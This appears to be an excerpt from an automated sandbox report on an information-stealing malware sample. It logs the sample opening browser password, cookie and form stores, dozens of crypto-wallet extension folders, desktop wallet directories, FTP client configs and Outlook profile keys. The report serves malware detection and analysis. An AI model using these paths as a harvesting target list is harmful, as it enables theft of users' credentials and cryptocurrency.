                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
